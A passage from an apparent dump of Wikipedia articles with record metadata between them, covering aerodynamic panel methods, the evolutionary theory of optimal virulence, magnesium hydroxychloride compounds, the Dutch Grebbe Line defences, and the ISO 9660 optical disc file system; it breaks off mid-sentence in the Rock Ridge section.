in creating well-posed problems quadratic varying strength - accurate, more difficult to create a well-posed problem Some techniques are commonly used to model surfaces. Body Thickness by line sources Body Lift by line doublets Wing Thickness by constant source panels Wing Lift by constant pressure panels Wing-Body Interface by constant pressure panels Methods of determining pressure Once the Velocity at every point is determined, the pressure can be determined by using one of the following formulas. All various Pressure coefficient methods produce results that are similar and are commonly used to identify regions where the results are invalid. Pressure Coefficient is defined as: The Isentropic Pressure Coefficient is: The Incompressible Pressure Coefficient is: The Second Order Pressure Coefficient is: The Slender Body Theory Pressure Coefficient is: The Linear Theory Pressure Coefficient is: The Reduced Second Order Pressure Coefficient is: What panel methods cannot do Panel methods are inviscid solutions. You will not capture viscous effects except via user "modeling" by changing the geometry. Solutions are invalid as soon as the flow changes locally from subsonic to supersonic (i.e. the critical Mach number has been exceeded) or vice versa. Potential flow software See also Stream function Conformal mapping Velocity potential Divergence theorem Joukowsky transform Potential flow Circulation Biot–Savart law Notes References Public Domain Aerodynamic Software, A Panair Distribution Source, Ralph Carmichael Panair Volume I, Theory Manual, Version 3.0, Michael Epton, Alfred Magnus, 1990 Boeing Panair Volume II, Theory Manual, Version 3.0, Michael Epton, Alfred Magnus, 1990 Boeing Panair Volume III, Case Manual, Version 1.0, Michael Epton, Kenneth Sidewell, Alfred Magnus, 1981 Boeing Panair Volume IV, Maintenance Document, Version 3.0, Michael Epton, Kenneth Sidewell, Alfred Magnus, 1991 Boeing Recent Experience in Using Finite Element Methods For The Solution Of Problems In Aerodynamic Interference, Ralph Carmichael, 1971 NASA Ames Research Center Fluid dynamics
Aerodynamic potential-flow code
Chemistry,Engineering
1,111
3,913,867
https://en.wikipedia.org/wiki/Optimal%20virulence
Optimal virulence is a concept relating to the ecology of hosts and parasites. One definition of virulence is the host's parasite-induced loss of fitness. The parasite's fitness is determined by its success in transmitting offspring to other hosts. For about 100 years, the consensus was that virulence decreased and parasitic relationships evolved toward symbiosis. This was even called the law of declining virulence despite being a hypothesis, not even a theory. It has been challenged since the 1980s and has been disproved. A pathogen that is too restrained will lose out in competition to a more aggressive strain that diverts more host resources to its own reproduction. However, the host, being the parasite's resource and habitat in a way, suffers from this higher virulence. This might induce faster host death, and act against the parasite's fitness by reducing probability to encounter another host (killing the host too fast to allow for transmission). Thus, there is a natural force providing pressure on the parasite to "self-limit" virulence. The idea is, then, that there exists an equilibrium point of virulence, where parasite's fitness is highest. Any movement on the virulence axis, towards higher or lower virulence, will result in lower fitness for the parasite, and thus will be selected against. Mode of transmission Paul W. Ewald has explored the relationship between virulence and mode of transmission. He came to the conclusion that virulence tends to remain especially high in waterborne and vector-borne infections, such as cholera and dengue. Cholera is spread through sewage and dengue through mosquitos. In the case of respiratory infections, the pathogen depends on an ambulatory host to survive. It must spare the host long enough to find a new host. Water- or vector-borne transmission circumvents the need for a mobile host. Ewald is convinced that the crowding of field hospitals and trench warfare provided an easy route to transmission that evolved the virulence of the 1918 influenza pandemic. In such immobilized, crowded conditions pathogens can make individuals very sick and still jump to healthy individuals. Other epidemiologists have expanded on the idea of a tradeoff between costs and benefits of virulence. One factor is the time or distance between potential hosts. Airplane travel, crowded factory farms, and urbanization have all been suggested as possible sources of virulence. Another factor is the presence of multiple infections in a single host leading to increased competition among pathogens. In this scenario, the host can survive only as long as it resists the most virulent strains. The advantage of a low virulence strategy becomes moot. Multiple infections can also result in gene swapping among pathogens, increasing the likelihood of lethal combinations. Evolutionary hypotheses There are three main hypotheses about why a pathogen evolves as it does. These three models help to explain the life history strategies of parasites, including reproduction, migration within the host, virulence, etc. The three hypotheses are the trade-off hypothesis, the short-sighted evolution hypothesis, and the coincidental evolution hypothesis. All of these offer ultimate explanations for virulence in pathogens. Trade-off hypothesis At one time, some biologists argued that pathogens would tend to evolve toward ever decreasing virulence because the death of the host (or even serious disability) is ultimately harmful to the pathogen living inside. For example, if the host dies, the pathogen population inside may die out entirely. Therefore, it was believed that less virulent pathogens that allowed the host to move around and interact with other hosts should have greater success reproducing and dispersing. But this is not necessarily the case. Pathogen strains that kill the host can increase in virulence as long as the pathogen can transmit itself to a new host, whether before or after the host dies. The evolution of virulence in pathogens is a balance between the costs and benefits of virulence to the pathogen. For example, studies of the malaria parasite using rodent and chicken models found that there was trade-off between transmission success and virulence as defined by host mortality. Short-sighted evolution hypothesis Short-sighted evolution suggests that the traits that increase reproduction rate and transmission to a new host will rise to high frequency within the pathogen population. These traits include the ability to reproduce sooner, reproduce faster, reproduce in higher numbers, live longer, survive against antibodies, or survive in parts of the body the pathogen does not normally infiltrate. These traits typically arise due to mutations, which occur more frequently in pathogen populations than in host populations, due to the pathogens' rapid generation time and immense numbers. After only a few generations, the mutations that enhance rapid reproduction or dispersal will increase in frequency. The same mutations that enhance the reproduction and dispersal of the pathogen also enhance its virulence in the host, causing much harm (disease and death). If the pathogen's virulence kills the host and interferes with its own transmission to a new host, virulence will be selected against. But as long as transmission continues despite the virulence, virulent pathogens will have the advantage. So, for example, virulence often increases within families, where transmission from one host to the next is likely, no matter how sick the host. Similarly, in crowded conditions such as refugee camps, virulence tends to increase over time since new hosts cannot escape the likelihood of infection. Coincidental evolution hypothesis Some forms of pathogenic virulence do not co-evolve with the host. For example, tetanus is caused by the soil bacterium Clostridium tetani. After C. tetani bacteria enter a human wound, the bacteria may grow and divide rapidly, even though the human body is not their normal habitat. While dividing, C. tetani produce a neurotoxin that is lethal to humans. But it is selection in the bacterium's normal life cycle in the soil that leads it to produce this toxin, not any evolution with a human host. The bacterium finds itself inside a human instead of in the soil by mere happenstance. We can say that the neurotoxin is not directed at the human host. More generally, the virulence of many pathogens in humans may not be a target of selection itself, but rather an accidental by-product of selection that operates on other traits, as is the case with antagonistic pleiotropy. Expansion into new environments A potential for virulence exists whenever a pathogen invades a new environment, host or tissue. The new host is likely to be poorly adapted to the intruder, either because it has not built up an immunological defense or because of a fortuitous vulnerability. In times of change, natural selection favors mutations that exploit the new host more effectively than the founder strain, providing an opportunity for virulence to erupt. Host susceptibility Host susceptibility contributes to virulence. Once transmission occurs, the pathogen must establish an infection to continue. The more competent the host immune system, the less chance there is for the parasite to survive. It may require multiple transmission events to find a suitably vulnerable host. During this time, the invader is dependent upon the survival of its current host. The optimum conditions for high virulence would be a community with immune dysfunction (and/or poor hygiene and sanitation) that was in all other ways as healthy as possible (eg optimum nutrition). See also References External links Empirical Support for Optimal Virulence in a Castrating Parasite Evolution of Virulence Adaptive Dynamics of Infectious Diseases: In Pursuit of Virulence ... Integrating across levels Interesting discussion of the complexity of optimal virulence theory `Small worlds' and the evolution of virulence: infection occurs ... Pathogen Virulence: The Evolution of Sickness - A Review from the Science Creative Quarterly Ecology Pathology
Optimal virulence
Biology
1,639
42,382,863
https://en.wikipedia.org/wiki/Magnesium%20hydroxychloride
Magnesium hydroxychloride is the traditional term for several chemical compounds of magnesium, chlorine, oxygen, and hydrogen whose general formula , for various values of x, y, and z; or, equivalently, . The simple chemical formula that is often used is Mg(OH)Cl, which appears in high school subject, for example.Other names for this class are magnesium chloride hydroxide, magnesium oxychloride, and basic magnesium chloride. Some of these compounds are major components of Sorel cement. Compounds The ternary diagram of the system MgO – – has the following well-defined and stable phases: (magnesium hydroxide, the mineral brucite) = ("phase 2", "2:1:4") = ("phase 3", "3:1:8") = ("Phase 5", "5:1:8") = ("Phase 9", "9:1:5") (magnesium chloride hexahydrate) Phase 3 and phase 5 may exist at ambient temperature, whereas the phase 2 and phase 9 are stable only at temperatures above 100 °C. All these compounds are colorless crystalline solids. At ambient temperature, there are also gel-like homogeneous phases that form initially when the reagents are mixed, and eventually crystallize as phase 5, phase 3, or mixtures with or . There are also other lower hydrates that can be obtained by heating the "natural" phases: (phase 2 dihydrate; ~230 °C) (phase 3 pentahydrate; ~110 °C) (phase 3 tetrahydrate; ~140 °C) (phase 5 tetrahydrate; ~120 °C) (phase 5 trihydrate; ~150 °C) (phase 9 dihydrate; ~190 °C) In addition, a heptahydrate of phase 5, , can be obtained by washing the natural octahydrate with ethanol. All four stable phases have anhydrous versions, such as (anhydrous phase 3) and (anhydrous phase 5), with the crystal structure of . They can be obtained by heating them to about 230 °C (phases 3 and 5) about 320 °C (phase 2), and about 260 °C (phase 9). History These compounds are the primary components of matured magnesia cement, invented in 1867 by the French chemist Stanislas Sorel. In the late 19th century, several attempts were made to determine the composition of set Sorel's cement, but the results were not conclusive. Phase 3 was properly isolated and described by Robinson and Waggaman in 1909, and phase 5 was identified by Lukens in 1932. Properties Solubility The oxychlorides are only very slightly soluble in water. In the system MgO – – at about 23 °C, the completely liquid region has vertices at the following triple equilibrium points (as mass fractions, not molar fractions): S1 = (Sol::P5) S2 = (Sol:P5:P3) S3 = (Sol:P3:) The other vertices are pure water, magnesium chloride hexahydrate, and the saturated solution ( by mass). Decomposition and degradation The anhydrous forms decompose when heated above 450-500 °C by decomposition of the hydroxide and chloride anions, releasing water and hydrogen chloride and leaving a magnesium oxide residue, by the reactions: Extended exposure of magnesium oxychlorides to water leaches out the soluble , leaving hydrated brucite . On exposure to the atmosphere, the oxychlorides will slowly react with carbon dioxide from the air to form magnesium chlorocarbonates. Anhydrous and partially hydrated forms also absorb water, turning into phase 5 and then phase 3 on the way to the chlorocarbonate. The exceptions are the dihydrate and hexahydrate of phase 9, that remain unchanged for many months. Structure The crystal structure of phase 3 is triclinic with space group and z = 2. The solid consists polymeric aquohydroxo cations, in the form of double chains of magnesium atoms surrounded and bridged by the oxygen atoms in hydroxy groups and complexed water molecules. These linear cations are interleaved and neutralized by chloride anions and some unbound water molecules, yielding the general formula . The structure of phase 5 is believed to be similar, with generic formula . The anhydrous forms of phase 3 and phase 5 have the same structure as : namely, layers of magnesium cations, each sandwiched between two layers of hydroxy or chloride anions. Phase 5 crystals form as long needles consisting of rolled-up sheets. The Raman spectrum of phase 3 has peaks at 3639 and 3657 cm−1, whereas phase 5 has peaks at 3608 and 3691 cm−1, and brucite has a peak at 3650 cm−1. These peaks are attributed to stretching vibrations of the OH groups. Phase 3 has also a peak at 451 cm−1, attributed to the stretching of Mg–O bonds. Preparation From MgO or and Phases 3 and 5 can be prepared by mixing powdered magnesium oxide MgO with a solution of magnesium chloride in water , in molar ratios 3:1:11 and 5:1:13, respectively, at room temperature. This is the common method of preparing Sorel magnesia cement. Magnesium hydroxide can also be used instead of the oxide, with adjusted amount of water. For best results, the magnesium oxide should have small particle size and large surface area. It can be prepared by calcination of magnesium hydroxycarbonate at about 600 °C. Higher temperatures increase particle size leading to slower reaction rate. It is believed that, during the reaction, the magnesium oxide is continuously hydrated and dissolved, helped by the slightly acidic character of the magnesium chloride solution. The acidity is attributed to hydrolysis of the magnesium hexahydrate cations: The protons (which are actually hydrated, e.g. as ) make the solution acidic; the pH varies from 6.5 to 4.7 as the concentration of increases from 30% to 70% (weight basis). The protons then react with and dissolve the nearly insoluble oxide or hydroxide, by such reactions as The ions and in solution then combine into complex cations with multiple magnesium atoms, bridged by hydroxide anions and water molecules (magnesium aquohydroxo complexes), with general formula . This process involves additional hydrolysis, turning some ligands into and freeing more , which keeps dissolving more oxide. With enough magnesium chloride, the dissolution of the oxide is relatively fast, and a clear solution of magnesium aquohydroxo cations can be obtained by filtration. Over a period of several hours, those cations keep combining into larger complexes, becoming less soluble as they grow. After a few hours (at room temperature), those cations and the chloride anions precipitate as (or turn the solution into) a hydrogel, which then gradually crystallizes into a mixture of phase 3, phase 5, solid magnesium oxide and/or chloride, and/or some residual solution. Depending on the proportion of the reagents, phase 5 may form at first, but then will react with excess chloride to form phase 3. The magnesium oxide can also react with water to form the hydroxide, which, being poorly soluble, would coat the oxide grains and stop further hydration. The acidity provided by hydrolysis of the cations in solution dissolves this coating, and thus allows the process to run continuously until one of the reagents is exhausted. From MgO or and HCl The compounds can also be prepared from magnesium oxide or hydroxide and hydrochloric acid. The MgO – – phase diagram is contained in the MgO – – HCl diagram. From and NaOH The difficulties of preparing the magnesium oxide and ensuring its full reaction can be avoided by using NaOH instead of MgO or , so that all reagents are solutions. However, sodium chloride NaCl may also precipitate for certain concentrations of the reagents. With this route, stable phase 5 precipitates in a rather narrow range of conditions, namely when the concentration [Cl] of chloride anions in solution is 2.02 ± 0.03 mol/L, the concentration [Mg] of magnesium (as and other cations) is 1.78 ± 0.07 mol/L, and the pH is 7.65 ± 0.05. Stable phase 3 precipitates in a broader range of cases, namely when [Cl] is 6.48 ± 2.17 mol/L, [Mg] is 3.14 ± 1.12 mol/L, and the pH is 6.26 ± 0.14 Other A short note from 1872 reported the formation a solid with approximate formula , as a mass of fine needles, from a solution of magnesium ammonium chloride with excess ammonia left standing for several months. G. André claimed in 1882 the preparation of anhydrous oxychlorides by fusing anhydrous magnesium chloride with powdered magnesium oxide. References Magnesium compounds Chlorides Oxides Metal halides Oxychlorides
Magnesium hydroxychloride
Chemistry
1,936
6,354,416
https://en.wikipedia.org/wiki/Grebbe%20Line
The Grebbe Line (Dutch: Grebbelinie) was a forward defence line of the Dutch Water Line, based on inundation. The Grebbe Line ran from the Grebbeberg in Rhenen northwards until the IJsselmeer. Early history and first decommissioning The Grebbe Line was first established in 1745 as a line of defense to protect the Netherlands from invading armies. If an invasion was imminent, parts of the area between Spakenburg and the Grebbeberg were to be flooded. Until World War II, it was never actually used for that purpose; an attempt was made in 1794 to establish a defensive line against the invading French army under General Jean-Charles Pichegru, but the joint British-Dutch army abandoned the line when the French troops approached. Throughout the 19th century, the Grebbe line was maintained as a defensive line. However, since no attacks appeared likely, it was deemed less necessary to maintain the costly fortifications, and in 1926, a large part of the fortifications was decommissioned. World War II In 1939 the disused line was once again fortified against a German attack on the Netherlands, but due to cost issues reinforcements never reached an acceptable level. In the extensive 1939-defence plans, in which the Grebbeline would be provided with more extensive and much denser concrete reinforcements, the line would fulfill its ancient task as a forward line of defensive. These plans would however never be executed, surpassed as they were by the events of the German invasion in May 1940. The Grebbeline by that time had been largely constructed behind vast inundations, after which a front line lay that was composed of classic trench works mixed with ferro and ferro-concrete bunkers of light and medium grade. The front-line trenches had hardly any depth and contained only half a battalion of infantry per single km of stretched line. Behind this front-line was a second row of trenches which had the function of a blocking defence should the front-line be penetrated. Reserves could be thrown in from this line and behind it were battalion and regimental CP's as well as forward light artillery positions. More to the rear were the medium and heavy artillery positions as well as divisional reserves. The Grebbeline had three weak spots. The first two were near the city of Amersfoort, the third one near the village Rhenen, where the elevated Grebbeberg - a 150 feet high elevation - had made inundation works impossible. These sectors had been additionally fortified. Instead of inundations it had been decided to place forward positions ahead of the main defences. In the meantime a large and bomb-proof pump house had come under construction that, once it would be operable, would be able to flood the area in front of the Grebbeberg after all. Also this counter-measure came too late in time. This left the Grebbeberg as a very vulnerable position in the entire Grebbeline. That had not gone unnoticed by the attackers to be. The Germans had extensively studied the battle grounds that they were to use in May 1940. Way ahead of the actual invasion German army staff officers managed to visit the Grebbeline in civilian outfits, carefully studying the actual threats and opportunities. Particularly the Rhenen area, close to the Rhine river, was noticed. It was the shortest away from German soil and seemed to be a weak spot in the Dutch defence line. The 207th Infantry Division chose to place its most formidable push at this point, for which it had the motorized SS Regiment Der Führer at its disposal too. The adjacent 227th Infantry Division, accompanied by the motorized SS Leibstandarte 'Adolf Hitler', had a less profound picture of the plans ahead. It chose to decide where to attack during the operation instead of before. Come May 1940, the two German divisions c/w their respective SS Regiments and additional heavy artillery regiments had little trouble overcoming the first obstacles and managed to reach the Grebbeline on the second day, although the 227th division would need more time, meeting more Dutch resistance on the way. The 207th division was supported by five artillery battalions and spearheaded by the fanatic SS Der Führer regiment. The latter had first raided the Arnhem fortifications near Westervoort and subsequently massed in the city of Wageningen opposing the Grebbeline. On the second day the SS regiment managed to take the forward defences, albeit that it took them all day and losses mounted considerably. The third day they managed to penetrate the front line near the Grebbeberg itself, fighting the rest of the day and evening to widen the gap. The SS was blocked by the last Dutch defence line though, causing the commander of the 207th division to move in his own division and move SS Der Fuhrer away to the north of the Grebbeberg. The SS Regiment had by then suffered severe losses, its third battalion was out of action entirely. Overnight the Dutch planned a major counterattack by four infantry battalions, which operation was poorly executed and moreover collided with an SS assault along the northern perimeter of the Grebbeberg defences mid-day on the fourth day of the invasion. German dive bombers sealed the fate of both the Dutch counterattack and the local defences period. The 207th division assaults over the Grebbeberg itself had been successful too, although severe losses were absorbed. By the end of the day the German infantry stood in the village of Rhenen. Around night fall the Germans realized that the Dutch defences had moved back. A quick reaction force from SS motorized units was formed, but would not manage to overtake the Dutch forces, that had also left one or two blocking parties behind to slow potential enemies down. The battle of the Grebbeberg had demanded 420 Dutch and around 250 German KIA. The number of WIA was about quadruple those numbers. The Dutch had lost thousands of POWs too as well as a great deal of material and artillery pieces. The second major battle during the German invasion was seen near the city of Scherpenzeel. The 227th Infantry Division had been slowed down by continuing Dutch cavalry efforts to counter their approach. Moreover, the SS Leibstandarte had been called off on the third day and been instructed to redeploy to the south of the Netherlands, where it had to push along the 9th Panzer Division. The 227th were on their own from then on and had decided to attack the Grebbeline near Scherpenzeel. That had been a poor selection of battlefield by the German division commander. The defences made a funny curve at this point, creating a right-angled shape with a steep corner in it. It was exactly at this point that two German infantry regiments had decided to assault the defences. By doing so they positioned themselves such that they got exposed to defensive fire from fixed and trench defences as well as artillery along two-thirds of their front and flank side. A basic offensive failure, hence a costly German defeat followed. Overnight the most forward pinned down German attackers managed to crawl back into their own lines. The 227th had lost 70 KIA during this effort, of which most of the 412th Regiment. Overnight Dutch artillery unleashed a heavy barrage on the suspected German positions, gradually bringing down the density of fire, which finally ceased shortly before dawn. The German command was quite under awe by this show of presence and had anticipated heavy fighting in the morning, but much to their surprise found the Dutch trenches deserted by morning. Behind the masquerade of the barrages the entire defence had moved back overnight. Pursued came much too late to overtake any Dutch formation before it had reached the next defences. Directly after the cessation of hostilities a large war cemetery was established on top of the Grebbeberg. German and Dutch victims of the battle were the first to be buried at this location, but during the war the Germans would use and extend this burial ground further as their death toll rose. After the war the Dutch reburied the German victims on the summary German field of honour in Ysselsteyn, where over 30,000 Germans were buried. The Grebbeberg war cemetery now holds around 800 Dutch victims of the May War in 1940, as well as a few of later (wartime) date. The Grebbe line was permanently decommissioned by the Dutch Government in 1951. Pantherstellung During the war, the Germans made use of the Grebbe Line to create their own defence line, the Pantherstellung. On 26 October 1944 General Walter Model initiated the building of the Pantherstellung. At the time, it was clear that the enemy would come from not the west but the south. The Germans wanted to protect the Holland region because of the V-2 rocket attacks on London. The Germans did not want to lose the ability to fire the rockets but wanted to prevent the Allies from reaching the IJsselmeer. The Germans had to make some changes to the design because the threat was expected from the south. From Veenendaal to Amersfoort, the defence line had the same configuration as the Grebbe Line. See also Dutch waterlines Defence Line of Amsterdam Hollandic Water Line IJssel Line Maas Line Peel-Raam Line Other Defence lines of the Netherlands References Grebbelinie website Website commemorating the World War II Battle of the Grebbeberg War over Holland (in English) Military history of the Netherlands World War II defensive lines Netherlands in World War II World War II sites in the Netherlands History of Gelderland History of Utrecht (province)
Grebbe Line
Engineering
1,959
15,145
https://en.wikipedia.org/wiki/ISO%209660
ISO 9660 (also known as ECMA-119) is a file system for optical disc media. The file system is an international standard available from the International Organization for Standardization (ISO). Since the specification is available for anybody to purchase, implementations have been written for many operating systems. ISO 9660 traces its roots to the High Sierra Format, which arranged file information in a dense, sequential layout to minimize nonsequential access by using a hierarchical (eight levels of directories deep) tree file system arrangement, similar to UNIX and FAT. To facilitate cross platform compatibility, it defined a minimal set of common file attributes (directory or ordinary file and time of recording) and name attributes (name, extension, and version), and used a separate system use area where future optional extensions for each file may be specified. High Sierra was adopted in December 1986 (with changes) as an international standard by Ecma International as ECMA-119 and submitted for fast tracking to the ISO, where it was eventually accepted as ISO 9660:1988. Subsequent amendments to the standard were published in 2013 and 2020. The first 16 sectors of the file system are empty and reserved for other uses. The rest begins with a volume descriptor set (a header block which describes the subsequent layout) and then the path tables, directories and files on the disc. An ISO 9660 compliant disc must contain at least one primary volume descriptor describing the file system and a volume descriptor set terminator which is a volume descriptor that marks the end of the descriptor set. The primary volume descriptor provides information about the volume, characteristics and metadata, including a root directory record that indicates in which sector the root directory is located. Other fields contain metadata such as the volume's name and creator, along with the size and number of logical blocks used by the file system. Path tables summarize the directory structure of the relevant directory hierarchy. For each directory in the image, the path table provides the directory identifier, the location of the extent in which the directory is recorded, the length of any extended attributes associated with the directory, and the index of its parent directory path table entry. There are several extensions to ISO 9660 that relax some of its limitations. Notable examples include Rock Ridge (Unix-style permissions and longer names), Joliet (Unicode, allowing non-Latin scripts to be used), El Torito (enables CDs to be bootable) and the Apple ISO 9660 Extensions (file characteristics specific to the classic Mac OS and macOS, such as resource forks, file backup date and more). History Compact discs were originally developed for recording musical data, but soon were used for storing additional digital data types because they were equally effective for archival mass data storage. Called CD-ROMs, the lowest level format for these type of compact discs was defined in the Yellow Book specification in 1983. However, this book did not define any format for organizing data on CD-ROMs into logical units such as files, which led to every CD-ROM maker creating its own format. In order to develop a CD-ROM file system standard (Z39.60 - Volume and File Structure of CDROM for Information Interchange), the National Information Standards Organization (NISO) set up Standards Committee SC EE (Compact Disc Data Format) in July 1985. In September/ October 1985 several companies invited experts to participate in the development of a working paper for such a standard. In November 1985, representatives of computer hardware manufacturers gathered at the High Sierra Hotel and Casino (currently called the Golden Nugget Lake Tahoe) in Stateline, Nevada. This group became known as the High Sierra Group (HSG). Present at the meeting were representatives from Apple Computer, AT&T, Digital Equipment Corporation (DEC), Hitachi, LaserData, Microware, Microsoft, 3M, Philips, Reference Technology Inc., Sony Corporation, TMS Inc., VideoTools (later Meridian), Xebec, and Yelick. The meeting report evolved from the Yellow Book CD-ROM standard, which was so open ended it was leading to diversification and creation of many incompatible data storage methods. The High Sierra Group Proposal (HSGP) was released in May 1986, defining a file system for CD-ROMs commonly known as the High Sierra Format. A draft version of this proposal was submitted to the European Computer Manufacturers Association (ECMA) for standardization. With some changes, this led to the issue of the initial edition of the ECMA-119 standard in December 1986. The ECMA submitted their standard to the International Standards Organization (ISO) for fast tracking, where it was further refined into the ISO 9660 standard. For compatibility the second edition of ECMA-119 was revised to be equivalent to ISO 9660 in December 1987. ISO 9660:1988 was published in 1988. The main changes from the High Sierra Format in the ECMA-119 and ISO 9660 standards were international extensions to allow the format to work better on non-US markets. In order not to create incompatibilities, NISO suspended further work on Z39.60, which had been adopted by NISO members on 28 May 1987. It was withdrawn before final approval, in favour of ISO 9660. JIS X 0606:1998 was passed in Japan in 1998 with much-relaxed file name rules using a new "enhanced volume descriptor" data structure. The standard was submitted for ISO 9660:1999 and supposedly fast-tracked, but nothing came out of it. Nevertheless, several operating systems and disc authoring tools (such as Nero Burning ROM, mkisofs and ImgBurn) now support the addition, under such names as "ISO 9660:1999", "ISO 9660 v2", or "ISO 9660 Level 4". In 2013, the proposal was finally formalized in the form of ISO 9660/Amendment 1, intended to "bring harmonization between ISO 9660 and widely used 'Joliet Specification'." In December 2017, a 3rd Edition of ECMA-119 was published that is technically identical with ISO 9660, Amendment 1. In 2019, ECMA published a 4th version of ECMA-119, integrating the Joliet text as "Annex C". In 2020, ISO published Amendment 2, which adds some minor clarifying matter, but does not add or correct any technical information of the standard. Specifications The following is the rough overall structure of the ISO 9660 file system. Multi-byte values can be stored in three different formats: little-endian, big-endian, and in a concatenation of both types in what the specification calls "both-byte" order. Both-byte order is required in several fields in the volume descriptors and directory records, while path tables can be either little-endian or big-endian. Top level The system area, the first 32,768 data bytes of the disc (16 sectors of 2,048 bytes each), is unused by ISO 9660 and therefore available for other uses. While it is suggested that they are reserved for use by bootable media, a CD-ROM may contain an alternative file system descriptor in this area, and it is often used by hybrid CDs to offer classic Mac OS-specific and macOS-specific content. Volume descriptor set The data area begins with the volume descriptor set, a set of one or more volume descriptors terminated with a volume descriptor set terminator. These collectively act as a header for the data area, describing its content (similar to the BIOS parameter block used by FAT, HPFS and NTFS formatted disks). Each volume descriptor is 2048 bytes in size, fitting perfectly into a single Mode 1 or Mode 2 Form 1 sector. They have the following structure: The data field of a volume descriptor may be subdivided into several fields, with the exact content depending on the type. Redundant copies of each volume descriptor can also be included in case the first copy of the descriptor becomes corrupt. Standard volume descriptor types are the following: An ISO 9660 compliant disc must contain at least one primary volume descriptor describing the file system and a volume descriptor set terminator for indicating the end of the descriptor sequence. The volume descriptor set terminator is simply a particular type of volume descriptor with the purpose of marking the end of this set of structures. The primary volume descriptor provides information about the volume, characteristics and metadata, including a root directory record that indicates in which sector the root directory is located. Other fields contain the description or name of the volume, and information about who created it and with which application. The size of the logical blocks which the file system uses to segment the volume is also stored in a field inside the primary volume descriptor, as well as the amount of space occupied by the volume (measured in number of logical blocks). In addition to the primary volume descriptor(s), supplementary volume descriptors or enhanced volume descriptors may be present. Supplementary volume descriptors describe the same volume as the primary volume descriptor does, and are normally used for providing additional code page support when the standard code tables are insufficient. The standard specifies that ISO 2022 is used for managing code sets that are wider than 8 bytes, and that ISO 2375 escape sequences are used to identify each particular code page used. Consequently, ISO 9660 supports international single-byte and multi-byte character sets, provided they fit into the framework of the referenced standards. However, ISO 9660 does not specify any code pages that are guaranteed to be supported: all use of code tables other than those defined in the standard itself are subject to agreement between the originator and the recipient of the volume. Enhanced volume descriptors were introduced in ISO 9660, Amendment 1. They relax some of the requirements of the other volume descriptors and the directory records referenced by them: for example, the directory depth can exceed eight, file identifiers need not contain '.' or file version number, the length of a file and directory identifier is maximized to 207. Path tables Path tables summarize the directory structure of the relevant directory hierarchy. For each directory in the image, the path table provides the directory identifier, the location of the extent in which the directory is recorded, the length of any extended attributes associated with the directory, and the index of its parent directory path table entry. The parent directory number is a 16-bit number, limiting its range from 1 to 65,535. Directories and files Directory entries are stored following the location of the root directory entry, where evaluation of filenames is begun. Both directories and files are stored as extents, which are sequential series of sectors. Files and directories are differentiated only by a file attribute that indicates its nature (similar to Unix). The attributes of a file are stored in the directory entry that describes the file, and optionally in the extended attribute record. To locate a file, the directory names in the file's path can be checked sequentially, going to the location of each directory to obtain the location of the subsequent subdirectory. However, a file can also be located through the path table provided by the file system. This path table stores information about each directory, its parent, and its location on disc. Since the path table is stored in a contiguous region, it can be searched much faster than jumping to the particular locations of each directory in the file's path, thus reducing seek time. The standard specifies three nested levels of interchange (paraphrased from section 10): Level 1: File names are limited to eight characters with a three-character extension. Directory names are limited to eight characters. Files may contain one single file section. Level 2: File Name + '.' + File Name extension or Directory Name may not exceed 31 characters in length (sections 7.5 and 7.6). Files may contain one single file section. Level 3: No additional restrictions than those stipulated in the main body of the standard. Files are also allowed to consist of multiple non-contiguous sections (with some restrictions as to order). Additional restrictions in the body of the standard: The depth of the directory hierarchy must not exceed 8 (root directory being at level 1), and the path length of any file must not exceed 255. (section 6.8.2.1). The standard also specifies the following name restrictions (sections 7.5 and 7.6): All levels restrict file names in the mandatory file hierarchy to upper case letters, digits, underscores ("_"), and a dot. (See also section 7.4.4 and Annex A.) If no characters are specified for the File Name then the File Name Extension shall consist of at least one character. If no characters are specified for the File Name Extension then the File Name shall consist of at least one character. File names shall not have more than one dot. Directory names shall not use dots at all. A CD-ROM producer may choose one of the lower Levels of Interchange specified in chapter 10 of the standard, and further restrict file name length from 30 characters to only 8+3 in file identifiers, and 8 in directory identifiers in order to promote interchangeability with implementations that do not implement the full standard. All numbers in ISO 9660 file systems except the single byte value used for the GMT offset are unsigned numbers. As the length of a file's extent on disc is stored in a 32 bit value, it allows for a maximum length of just over 4.2 GB (more precisely, one byte less than 4 GiB). It is possible to circumvent this limitation by using the multi-extent (fragmentation) feature of ISO 9660 Level 3 to create ISO 9660 file systems and single files up to 8 TB. With this, files larger than 4 GiB can be split up into multiple extents (sequential series of sectors), each not exceeding the 4 GiB limit. For example, the free software such as InfraRecorder, ImgBurn and mkisofs as well as Roxio Toast are able to create ISO 9660 file systems that use multi-extent files to store files larger than 4 GiB on appropriate media such as recordable DVDs. Linux supports multiple extents. Since amendment 1 (or ECMA-119 3rd edition, or "JIS X 0606:1998 / ISO 9660:1999"), a much wider variety of file trees can be expressed by the EVD system. There is no longer any character limit (even 8-bit characters are allowed), nor any depth limit or path length limit. There still is a limit on name length, at 207. The character set is no longer enforced, so both sides of the disc interchange need to agree via a different channel. Extensions and improvements There are several extensions to ISO 9660 that relax some of its limitations. Notable examples include Rock Ridge (Unix-style permissions and longer names), Joliet (Unicode, allowing non-Latin scripts to be used), El Torito (enables CDs to be bootable) and the Apple ISO 9660 Extensions (file characteristics specific to the classic Mac OS and macOS, such as resource forks, file backup date and more). SUSP System Use Sharing Protocol (SUSP, IEEE P1281) provides a generic way of including additional properties for any directory entry reachable from the primary volume descriptor (PVD). In an ISO 9660 volume, every directory entry has an optional system use area whose contents are undefined and left to be interpreted by the system. SUSP defines a method to subdivide that area into multiple system use fields, each identified by a two-character signature tag. The idea behind SUSP was that it would enable any number of independent extensions to ISO 9660 to be created and included on a volume without conflicting. It also allows for the inclusion of property data that would otherwise be too large to fit within the limits of the system use area. SUSP defines several common tags and system use fields: CE: Continuation area PD: Padding field SP: System use sharing protocol indicator ST: System use sharing protocol terminator ER: Extensions reference ES: Extension selector Other known SUSP fields include: AA: Apple extension, preferred BA: Apple extension, old (length attribute is missing) AS: Amiga file properties ZF: zisofs compressed file, usually produced by program mkzftree or by libisofs. Transparently decompressed by Linux kernel if built with CONFIG_ZISOFS. AL: records Extended File Attributes, including ACLs. Proposed by libburnia, supported by libisofs. The Apple extensions do not technically follow the SUSP standard; however the basic structure of the AA and AB fields defined by Apple are forward compatible with SUSP; so that, with care, a volume can use both Apple extensions as well as RRIP extensions. Rock Ridge The Rock Ridge Interchange Protocol (RRIP, IEEE P1282) is an extension which adds POSIX file system semantics. The availability of these extension properties allows for better integration with Unix and Unix-like operating systems. The standard takes its name from the fictional town Rock Ridge in Mel Brooks' film Blazing Saddles. The RRIP extensions are, briefly: Longer file names (up to 255 bytes) and fewer restrictions on 